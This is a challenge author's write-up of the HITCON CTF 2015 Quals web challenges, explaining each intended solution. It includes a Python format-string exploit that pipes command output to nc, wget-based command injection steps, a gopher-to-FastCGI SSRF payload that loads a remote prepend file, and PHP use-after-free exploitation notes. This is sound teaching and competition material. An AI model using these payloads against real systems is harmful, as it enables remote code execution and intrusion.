HITCON CTF 2015 Quals Web Writeup

P.S. The related code is on GitHub. If you are interested in the research, look at the code first and try to work it out yourself before reading on!

Written after HITCON CTF 2015 Quals. As a member of the challenge team, I have to say the difficulty of this competition was really not low XD, but as a DEFCON qualifier I think it lived up to its name! :) This time I was in charge of all the Web challenges; privately, they are all things I feel confident about. Reacting to contestants' feedback, we turned some things we had recently been researching into challenges XD. My main goal was that the challenges feel hard to solve, but after seeing the solution players think "so that's how it works" and "you can play it like this" XD
0x01 100 BabyFirst (33 teams)
<?php
    highlight_file(__FILE__);
    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) )
            exit();
    }

    exec("/bin/orange " . implode(" ", $args));
?>

https://gist.github.com/orangetw/cb3487e47d7aaaea4692
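As an added illustration (not code from the challenge or from the original post), the same anchoring mistake reproduced in Python's re module, whose `$` behaves like PCRE's default: the filter is mirrored as a function that returns the command line exec() would receive, next to the hardened pattern that anchors on the real end of the string.

```python
import re

# The challenge's pattern. In Python's re, as in PCRE without the /D modifier, '$' also
# matches just before a trailing newline, so "foo\n" passes although \w never matches "\n".
# (Python's \w is Unicode-aware; PHP's is ASCII-only without /u, which does not matter here.)
CHALLENGE_FILTER = re.compile(r"^\w+$")
# \Z is the absolute end of the string (PCRE spells it \z; PHP can also use the /D modifier).
HARDENED_FILTER = re.compile(r"^\w+\Z")

def build_command(args, pattern=CHALLENGE_FILTER):
    """Mirror the PHP loop: reject the request if any argument fails the pattern,
    otherwise return the string that exec() would hand to /bin/sh."""
    for arg in args:
        if not pattern.match(arg):
            return None
    return "/bin/orange " + " ".join(args)

def shell_commands(cmdline):
    """Commands the shell would actually run: a newline ends one command and starts the next."""
    return [c.strip() for c in cmdline.split("\n") if c.strip()]
```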
As the simplest Web challenge, the code to analyze is only fifteen lines long, yet it took two hours after the start before anyone solved it. The regex bypass is the common one: `$` in preg_match tolerates a trailing newline, so a \n gets you past the check. The real difficulty is that even with command injection, the command is limited to a-zA-Z0-9_. That is also the most interesting part: every team's idea was different, so there were many solutions! The official solution was

mkdir orange
cd orange
wget HEXED_IP
tar cvf payload orange
php payload

after which you can execute arbitrary code. Looking through the logs, other teams used busybox ftpget ..., twistd telnet ..., or wget HEX_IP with the server answering a 302 redirect to the FTP protocol, which was the most unusual one XD. I had checked the wget source and thought the generated index.html should be uncontrollable, but it turns out you can control it through the FTP protocol. Overall you could also see some extreme command-line tricks XD. I think it is the most successful challenge: for anyone who has learned the trick it is simple, fun and interesting!

0x02 200 nanana (18 teams)
https://gist.github.com/orangetw/4942d949134227eedd4c
xxd -r -p nanana.xxd > nanana

Despite its name, this Web challenge is actually a Pwn challenge: only the binary is provided, not libcgi, so you have to solve it without the library! It is a simple format string vulnerability but with no output (sprintf), so you overwrite the GOT entry of do_job with the PLT address of system. Before that, you have to use the stack guard's "stack smashing detected" message, which prints ARGV1, to get an arbitrary address leak; once the password is leaked, the rest is easy. However, because the binary is 64-bit and the supplied fields cannot contain NULL bytes, when building ARGV1 you first use username to overwrite the tail of ARGV1 with NULL, then use job to overwrite its low three bytes with the memory location (0x601090); the remaining five bytes are NULL, which gives a read of an arbitrary address. See the exploit for details:
# Python 2 (print statement, str used as bytes)
import requests
from urllib import urlencode
from struct import pack, unpack

URL = 'http://54.92.88.102/cgi-bin/nanana'

def leak(address):
    # Arbitrary read: the stack guard's "*** stack smashing detected ***" message
    # prints the string at ARGV1, so ARGV1 is pointed at the address to leak.
    address = pack('I', address)
    address = address.strip('\x00')      # no NULL bytes can be sent; the rest are already NULL
    payload = {
        'username': 'A'*349,
        'password': 'B'*380,
        'job': 'C'*392 + address
    }
    r = requests.get(URL+'?'+urlencode(payload))
    l = r.headers['*** stack smashing detected ***']
    l = l.strip(' terminated')
    l = l.ljust(8, '\x00')
    try:
        return unpack('Q', l)            # 8-byte leak: return as an integer
    except:
        return l                         # longer leak (e.g. the password): return the string

def e(cmd, pwd):
    # Format string write (%hhn) redirecting the do_job GOT entry to system's PLT.
    payload = {
        'username': cmd,
        'password': pwd,
        'job': '\x48\x10\x60',
        'action': '%198x%15$hhn'
    }
    print urlencode(payload)
    r = requests.get(URL+'?'+urlencode(payload))

if __name__ == '__main__':
    pwd = leak(0x601090)
    print 'pwd @ %s' % pwd
    e('id | nc 127.0.0.1 12345', pwd=pwd)
https://gist.github.com/orangetw/583a73f58d49b1a3fc14

0x03 300 Giraffe's Coffee (Team concert)
https://gist.github.com/orangetw/4a412fb0d49cad0c4ea3

The core concept of this challenge is PRNG prediction in PHP. Because it is hard for a computer to produce true randomness, most random numbers are generated by a PRNG, and in PHP the PRNG is a modified Mersenne Twister. When no seed is given, php_mt_rand derives the seed from the current pid and time with a few operations, and that seed is only 32 bits long, so some teams tried to crack it with ready-made tools. They found that it failed: the PRNG could not be predicted correctly, because PHP under Apache runs in prefork mode, so each connection is served by one of the processes forked earlier. You therefore cannot tell whether the PRNG STATE in the current process is fresh, and the process behind each connection is not necessarily the same, which makes the STATE even less predictable (the ready-made tools only compute the first outputs after seeding). In this situation you can use Keep-Alive to make sure you keep talking to the same process, and then combine the original seed cracking with the STATE operations (624 states in total) to solve it!

0x04 400 lalala (2 teams)

A service that lets users upload images, or supply a URL so the site fetches and uploads the image for them. The core concept is using a 302 redirect to bypass the restriction and achieve SSRF, and then using gopher inside the SSRF to speak the FastCGI protocol to the local PHP-FPM and achieve remote code execution. While the image is being fetched, a 302 can be used for SSRF (in fact, many people ignore 302 when studying SSRF; it is one of the highlights of this challenge). With the SSRF, reading a file (Location: file://localhost/etc/passwd) reveals that the server is Nginx + PHP-FPM, with PHP-FPM's FastCGI bound to a port on the local machine. In the real world, whenever you find a PHP FastCGI that can be reached from outside, you can get a shell. So if you use gopher to construct the FastCGI protocol and send it to port 9001 on the local machine, you can execute code:

Location: gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00%00%00%04i%01%8B%13%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/_www/index.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//

(This uses PHP_ADMIN_VALUE to set allow_url_include to On and PHP_VALUE to point auto_prepend_file at your own website.)

Another interesting point: if you use gopher in SSRF, you find that Java's gopher only accepts 0x00-0x7f, while libcurl only accepts 0x01-0xff. This challenge uses curl_exec in PHP, and libcurl could not send a NULL byte, yet the FastCGI protocol cannot be constructed without NULL bytes. Later I studied the libcurl source and found that the NULL byte was lost because of a write bug, so I sent a commit, which was accepted (linked below)... XD
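As an added example that is not part of the original post or the challenge code, a small FastCGI encoder/decoder in Python: it builds a request carrying the same parameter names as the gopher payload above (placeholder values, constructed here), parses records and name-value pairs back, and implements the check a proxy or IDS in front of PHP-FPM could run to flag php.ini overrides arriving in PARAMS records; record layout and length encoding follow the FastCGI specification.

```python
import struct
FCGI_BEGIN_REQUEST, FCGI_PARAMS = 1, 4
# Params that rewrite php.ini for one request; a front end must never let a client supply them.
INI_OVERRIDES = {"PHP_VALUE", "PHP_ADMIN_VALUE", "PHP_FLAG", "PHP_ADMIN_FLAG"}

def _len(n):  # name/value length: 1 byte below 128, else 4 bytes big-endian with the top bit set
    return struct.pack(">B", n) if n < 128 else struct.pack(">I", n | 0x80000000)
def _rdlen(b, i):  # inverse of _len: returns (length, offset after it)
    return (b[i], i + 1) if b[i] < 128 else (struct.unpack(">I", b[i:i + 4])[0] & 0x7FFFFFFF, i + 4)

def record(rtype, content, req_id=1):
    # 8-byte header: version 1, type, request id, content length, padding length, reserved
    return struct.pack(">BBHHBB", 1, rtype, req_id, len(content), 0, 0) + content

def build_request(params):
    # BEGIN_REQUEST (role RESPONDER=1, flags 0, 5 reserved bytes), PARAMS, empty PARAMS terminator
    body = b"".join(_len(len(k)) + _len(len(v)) + k + v for k, v in params)
    return (record(FCGI_BEGIN_REQUEST, struct.pack(">HB5x", 1, 0))
            + record(FCGI_PARAMS, body) + record(FCGI_PARAMS, b""))

def parse_records(data):
    # Yield (type, request id, content) per record; the NUL-heavy headers are why gopher must carry NULs
    off = 0
    while off + 8 <= len(data):
        ver, rtype, rid, clen, plen, _ = struct.unpack(">BBHHBB", data[off:off + 8])
        if ver != 1:
            raise ValueError("not a FastCGI v1 record at offset %d" % off)
        yield rtype, rid, data[off + 8:off + 8 + clen]
        off += 8 + clen + plen

def parse_params(content):
    # Decode the name-value pairs of one PARAMS record into a dict
    pairs, i = {}, 0
    while i < len(content):
        nl, i = _rdlen(content, i)
        vl, i = _rdlen(content, i)
        pairs[content[i:i + nl].decode()] = content[i + nl:i + nl + vl].decode()
        i += nl + vl
    return pairs

def ini_overrides_in(data):
    # Names of php.ini-overriding params found in any PARAMS record of a captured request
    found = []
    for rtype, _, content in parse_records(data):
        if rtype == FCGI_PARAMS and content:
            found += [k for k in parse_params(content) if k in INI_OVERRIDES]
    return found

# Constructed sample using the challenge's parameter names; the values are placeholders.
SAMPLE = build_request([(b"REQUEST_METHOD", b"GET"), (b"SCRIPT_FILENAME", b"/_www/index.php"),
                        (b"PHP_ADMIN_VALUE", b"allow_url_include = On"), (b"PHP_VALUE", b"auto_prepend_file = http://PLACEHOLDER/")])
```

The first 16 bytes of SAMPLE are the BEGIN_REQUEST record, which is the "%01%01..%00%08%00%00%00%01%00%00%00%00%00%00" prefix of the gopher payload above with request id 1.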
https://github.com/bagder/curl/commit/5bf36ea30d38b9e00029180ddbab73cab94a2195
So with the newer versions of libcurl/curl, gopher should be able to use NULL bytes XD

0x05 500 Use-After-FLEE (1 team, only PPP)

The hardest Web challenge, and a situation often met during penetration testing XD: other websites on the same host are restricted by open_basedir and disable_functions, but PHP has had many memory corruption holes in its history, and this challenge uses one of them (at the time of the challenge, the PHP preinstalled via Ubuntu apt-get was still vulnerable, but it seems to have been fixed by the time of writing XD). For a PoC of the vulnerability, refer to 80vul's PHP Codz Hacking, but it is only a PoC :(
https://github.com/80vul/phpcodz/blob/master/research/pch-034.md

Using the Use-After-Free to bypass the restrictions above sounds very simple, but today's systems carry a lot of protection; you have to face DEP, full ASLR, PIE (fully enabled by default for Apache) and full RELRO (Apache's default build). Because the environment is Apache + mod_php, PHP is loaded into Apache as a library, which makes exploitation harder (the CLI alone is actually very easy to exploit); for example, you have to handle parsing the ELF yourself XD. But PPP, worthy of being the strongest team, solved it one and a half hours before the end of the game and was the only team to do so!
However, it is a bit of a pity that the game platform was EC2 Ubuntu 14.04 64-bit, so for the libc offsets they directly reused the libc offsets from the other Pwn challenges instead of locating them from STRTAB, SYMTAB and JMPREL. Ricky of PPP's writeup:
https://github.com/pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/exploit.php

Here Ricky uses the ZVAL structure, replacing handler with the address of system, declaring the ZVAL type as OBJECT and setting refcount to 0:

struct _zval_struct {
    zvalue_value value;
    zend_uint refcount__gc;
    zend_uchar type;
    zend_uchar is_ref__gc;
};

This way, when PHP finds during internal processing that the reference count is 0, it automatically destructs and passes the ZVAL as the argument to the handler; in this case the command is limited to 8 bytes (so Ricky uses sh /*/a; to execute the command). However, if the limit were 4 bytes under 32-bit, it would be almost impossible to use XD. A more elegant method is to change this into GOT hijacking of fopen and call fopen to execute the command:

write($open_got, $system_address);
fopen("|$cmd", "r");

If you are interested, you can try reading and writing it yourself, and try to write a perfect exploit! :P